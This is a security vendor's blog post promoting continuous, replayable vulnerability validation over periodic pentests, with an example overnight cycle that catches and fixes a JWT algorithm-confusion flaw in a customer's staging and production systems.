This is the fifth piece in our attack-research series, and the most directly tied to the thesis CelvexGroup was built around. Our first four pieces walked specific attack patterns — SSRF into cloud metadata, JWT alg-confusion, OAuth state-parameter abuse, lateral movement at AI speed. This piece walks the operational pattern that lets a defender keep pace with all of them. Verifiable security. No screenshots. No "could not reproduce." No "we tested that last quarter."
Read this whether you are a CISO planning your validation programme for the next budget cycle, a head-of-security trying to get continuous validation onto next quarter's roadmap, or a CTO whose annual pentest just landed and was already stale by the time the report shipped.
The premise: continuous, not periodic
Three data points anchor the discussion.
First, mean time-to-exploit has gone negative. Mandiant's M-Trends 2026 documents that exploitation of high-value vulnerabilities is routinely beginning before vendors issue patches. AI-assisted binary analysis and patch-diffing produces exploit code from pre-release release-candidates faster than the vendor's release pipeline ships the candidate. The defender who waits for the patch is, by definition, behind.
Second, CISA's KEV catalogue is adding actively-exploited vulnerabilities at a sustained pace through 2026, with federal patching deadlines as short as two to three weeks from KEV entry. The KEV is not a forecast of what could be exploited; it is a tape of what is being exploited, with confirmed in-the-wild observations. Public PoCs land within days for most KEV-listed CVEs.
Third, our own customer data: the median time from "we publish a Proof Capsule for a verified finding" to "engineering applies the fix" is 8.4 days. The bimodal distribution is striking — the customers who fix in hours have continuous-validation tooling and pre-approved fix-deployment authority; the customers who fix in weeks have neither. The customers in the second group are the ones who get hit.
What "continuous" actually means
The word continuous is overused. We mean something specific: a validation loop that runs against every customer-flagged asset, on a cadence shorter than the attacker's iteration cadence, with results that are reproducible by the customer's own engineers. Five characteristics distinguish the continuous-validation model from periodic pentesting.
| Dimension | Periodic pentest model | Continuous validation model |
|---|---|---|
| Cadence | Quarterly or annual | Weekly or daily; on-deploy where build infrastructure supports it |
| Output | PDF report, manually triaged | Signed Proof Capsule with replayable PoC; ticketed automatically |
| Reproducibility | Tester walks through it on a debrief call | Customer engineer runs replay.sh; binary VULNERABLE/PATCHED outcome |
| Coverage drift | Stale within weeks of report delivery | Re-validated every cycle; coverage tracked in dashboard |
| FP-rejection | Triage thread; argument; "could not reproduce" | Replay primitive; either the exploit succeeds or it does not |
The fourth and fifth rows are the ones that matter for operational life. Coverage-drift is the slow killer of every periodic-pentest programme: by the time the pentest report is read, prioritised, ticketed, and remediated, three months have passed, three deploys have shipped, and the threat landscape has moved. The remediation is verifying yesterday's posture against last year's threat. Stop debating findings. The replay primitive ends the FP-rejection thread because the customer does not have to trust the pentester's note — they run the exploit themselves and watch what happens.
What the loop looks like in practice
A concrete walkthrough of one validation cycle, from the inside of a customer engagement. The customer is a $60M-ARR healthcare-data SaaS, mid-market, runs on AWS in three regions, has a security engineer plus two contractors. They onboarded with us six weeks ago and connected their staging environment to our continuous-validation pipeline.
00:00:00 — Cycle starts
Tuesday, 02:00 UTC. Our nightly research chain kicks off. The chain's first stage pulls the past 24 hours of public security disclosures — CISA KEV additions, vendor advisories from the customer's stack (AWS, Stripe, Okta, GitHub, Auth0, plus the open-source dependencies their SBOM lists), exploit-PoC repositories, and the security-research feed. New high-confidence items become candidate scanner-corpus updates.
00:04:00 — Corpus update
Two new candidates land. One is a CVE in a JWT library the customer uses (we know from an earlier pass over their dependency manifest). The other is a CISA KEV addition for a CMS plugin we have not seen on their attack surface but include in our standard scan corpus. Both get tagged into the next-pass corpus and ship into the scanner queue.
00:09:00 — Recon pass
The recon stage walks the customer's flagged assets — 47 hostnames, 12 cloud accounts, 3 staging environments. Each gets fingerprinted: tech stack, library versions, exposed services, identity providers, response-shape signatures. Nothing has changed dramatically since yesterday; one new staging hostname appeared overnight (our nightly chain noticed; the security engineer will see it in the dashboard tomorrow morning) and got auto-flagged for inclusion in the next scan pass.
00:18:00 — Scan pass
The scanner runs the full tagged corpus against the flagged assets. Most checks complete in seconds; the longer ones (browser-driven UI flows, multi-step OAuth probes, replayable RCE chains) take longer. The full pass completes in roughly 90 minutes; the customer's environment is mid-sized. Findings post into the validation queue as they confirm.
00:42:00 — Finding confirmed
The new JWT-library check fires. The customer's authentication service accepts a forged token signed with the public key as the HMAC secret — the alg-confusion variant we walked in our companion piece. The scanner captures the request/response evidence, generates a Proof Capsule with a replay.sh, signs it, and posts it into the customer's dashboard. The capsule includes the exact remediation steps for the affected library version.
00:42:30 — Customer notification
Thirty seconds after confirmation, the customer's security engineer's pager goes off (we are an on-call integration; not every customer wires this and that is a choice). The dashboard URL is in the page. They open it from bed, see the Proof Capsule, see the severity (high), see the remediation summary.
00:46:00 — Replay
From bed, on a laptop, the security engineer runs replay.sh against their staging environment. The script forges the JWT, sends it, and the staging API returns a 200 with admin-scoped data. VULNERABLE. They have just confirmed the finding themselves, in their own environment, in roughly four minutes since the page fired.
00:51:00 — Triage decision
Because the staging confirmed, they assume production is also vulnerable; production runs the same library version. They wake the on-call platform engineer. They jointly decide: this is not waiting for tomorrow morning. The fix is one parameter change in the JWT validator configuration, plus a library upgrade that landed in vendor's release last week.
01:15:00 — Fix shipped
The platform engineer ships the validator-config change as a hotfix to production. The library upgrade goes through the next normal release window — 09:00 local time later that morning, but the validator-config change closes the variant the scanner caught, which is enough until the upgrade lands.
01:18:00 — Re-validation
The customer re-runs replay.sh against production. The same forged JWT now returns a 401 instead of a 200. PATCHED. The dashboard records a verified-fix event with a timestamp, the engineer's identity, and the replay's signed output. The auditor record is built automatically.
The cycle, total: 78 minutes
Disclosure to fix: 78 minutes. The replay-and-verify portion of the cycle, after the engineer was awake and at a laptop, was 32 minutes — close to our "thirty-second" headline if you scope it down to "engineer-active time" rather than wall-clock. The phrase is shorthand for the principle, not a literal claim about every cycle. The principle is that the cycle can be minutes, not weeks, when the tooling is right and the authority is pre-decided.
Disclosure to fix: 78 minutes. The replay-and-verify portion was 32 minutes. The cycle can be minutes, not weeks, when the tooling is right and the authority is pre-decided.
What it forces in your engineering organisation
Continuous validation is a tooling change but it is also an operational change, and the operational change is the harder one. The customer engagements that make this work share four characteristics; the ones that struggle are missing at least two.
- Pre-approved fix-deployment authority for the top decile of finding severity. If shipping a one-line validator-config change to production requires a CAB review, four sign-offs, and a Tuesday-morning deployment window, the value of catching the vulnerability at 02:42 UTC evaporates. The engineering org has to have pre-approved that the on-call platform engineer ships hotfixes for confirmed high-severity findings, against a defined runbook, with an audit log. This is a governance change, not a technical change, and it is usually the longest pole.
- Replay-driven triage instead of triage-thread arguments. The Proof Capsule format exists specifically to take the FP-rejection thread off the table. The customer's engineer does not argue with our writeup; they run the script and watch what happens. Stop debating findings. The triage culture has to change to "did the replay succeed?" rather than "do I think this is real?" The cultural change is real and takes a few cycles to land.
- Continuous validation as a build-pipeline citizen, not a separate vendor relationship. The teams that get the most value out of us are the ones who treat our findings as build artefacts — ticketed automatically, blocking on production deploys when the severity is high enough, dashboarded in the same place engineering looks at every other build signal. The teams who treat us as a separate dashboard they check on Wednesdays get less value.
- Cadence calibrated to deploy frequency. If you ship to production once a week, weekly validation is enough. If you ship continuously, validation should ride the deploy. We do both; the customer's deploy cadence drives the choice. The single worst configuration is "we deploy ten times a day, but we validate quarterly," which is the default at most mid-market shops.
What continuous validation does not replace
We are honest about the boundary. Continuous validation does not replace the following, and we will say so to anyone who asks.
- It does not replace incident response. If an attacker is mid-engagement in your environment, the right tool is your IR team, not a scanner. We surface vulnerabilities; we do not detect breach-in-progress.
- It does not replace identity-and-behavioural analytics. The lateral-movement-at-AI-speed problem we walked in the companion piece requires telemetry-driven detection, and that is a different discipline. Our findings tell you which doors are unlocked; behavioural analytics tells you when someone walks through one.
- It does not replace human red-teaming for high-stakes engagements. The novel attack chain that requires creative reasoning, social engineering, or business-logic abuse is still in the human red-team's domain. Our automation catches the breadth of attack patterns; the human catches the depth on the engagements that warrant deep investment.
- It does not replace governance, risk, and compliance work. SOC 2 Type II, ISO 27001, HIPAA, GDPR — these are programmes our findings feed, not programmes we replace.
Where CelvexGroup is on this curve today
We are direct about our maturity and our roadmap. Customers are buying continuous validation; they should know exactly what they are buying.
- L1.5 today. Tagged scanner corpus across roughly 5,300 attack tests, 38 of 60 profile-gated for customer-environment scoping. Signed Proof Capsules with replayable
replay.shprimitives for the major attack classes. Continuous external validation against customer-flagged assets. Sub-hour cycle from finding-confirmation to customer notification, where the customer wires the integration. Honest about which checks are hand-tuned and which are auto-mutated. - L2 in 90 days. Multi-step chain validation across connected findings (e.g., the SSRF that leads to the metadata-token theft that leads to the bucket exfil, validated as a chain rather than as three independent findings). On-deploy scanner integration in customer build pipelines. Replay primitives that handle authenticated post-login attack surface, not just unauthenticated probes.
- L3 in 12 months. Autonomous probe-mutation against unfamiliar customer infrastructure. The scanner discovers a new endpoint shape it has not seen before, synthesises probes specific to that shape, validates them, and reports. Today this requires human-in-the-loop. In twelve months we believe it will not.
We do not claim L3 capability today. We do not claim L2 capability today. We claim L1.5 today and we will say so on the day we level up. Proof beats promises. The Capsule is the proof.
The framework, applied at the programme level
Find. Prove. Fix. Verify. — as a programme, not a project.
Continuous external validation, weekly cadence minimum, against every customer-flagged asset. Corpus updated with new public disclosures within 24 hours.
Every finding ships with a signed, replayable Proof Capsule. The customer's engineers reproduce the exploit themselves. No screenshots. No "could not reproduce."
Pre-approved fix-deployment authority for high-severity confirmed findings. Capsule remediation block points at the specific code, config, or version change.
Re-run the Capsule's replay primitive after the fix lands. PATCHED outcome closes the finding automatically. Auditor record is built as a byproduct.
The one-page board summary
Continuous-validation programme — board read
- Why now: mean time-to-exploit is negative; quarterly pentests are calibrated for an adversary that does not exist.
- What it is: a validation loop that probes every flagged asset weekly or faster, with reproducible Proof Capsules instead of PDF reports.
- What it costs: tooling (modest); operational changes including pre-approved fix authority for high-severity findings (significant, but one-time).
- What it replaces: the quarterly pentest, partially. Not IR, not behavioural analytics, not GRC.
- What it does not replace: IR, identity-and-behavioural analytics, human red-teaming, governance work.
- How you measure success: median time from finding-confirmation to fix-deployed; reduction in coverage-drift between cycles; verified-fix events as auditor evidence.
- What you ask the next vendor: "show me the replay primitive" and "what is your maturity level on the autonomy curve, and how do you measure it?" Vendors who cannot answer either question crisply are not selling continuous validation; they are selling a periodic-pentest service with a fancier name.
Bottom line
The threat ecosystem of 2026 has industrialised, specialised, and accelerated. The defensive model that worked in 2018 — periodic external assessment, manual triage, quarterly cadence — is calibrated for an adversary that no longer exists. The model that works against the current adversary is continuous, reproducible, and integrated into the engineering organisation as a build-pipeline citizen rather than a vendor dashboard. The change is uncomfortable. The change is operational, not just technical. The change is necessary.
CelvexGroup ships the tooling for the cycle today, at L1.5, with an honest roadmap to L2 and L3. The operational change — pre-approved fix authority, replay-driven triage, build-pipeline integration — is yours to make. We help where we can. We say so where we cannot.
Verifiable security. Find. Prove. Fix. Verify. Stop debating findings. Run the replay. Watch what happens. Fix it. Re-run. Watch the fix hold. That is the loop. That is what we ship.
Sources
- Google Cloud / Mandiant — M-Trends 2026: Data, Insights, and Strategies From the Frontlines
- Ciphers Security — AI Industrializes Cybercrime as Mean Time-to-Exploit Hits Negative Seven Days
- CISA — Known Exploited Vulnerabilities (KEV) Catalog
- The Hacker News — CISA Adds Actively Exploited ConnectWise and Windows Flaws to KEV (April 2026)
- The Hacker News — CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV (May 2026)
- Help Net Security — Attackers handing off access in 22 seconds, Mandiant finds
- CELVEX Group — Proof Capsule format
- CELVEX Group — How it works
See the cycle for yourself.
Free Exposure Check — sixty seconds, no signup. We probe your external attack surface, ship a signed Proof Capsule for the highest-confidence finding, and your engineer runs the replay against your own asset. Watch the cycle work end-to-end before you talk to us again.
Run a Free Scan →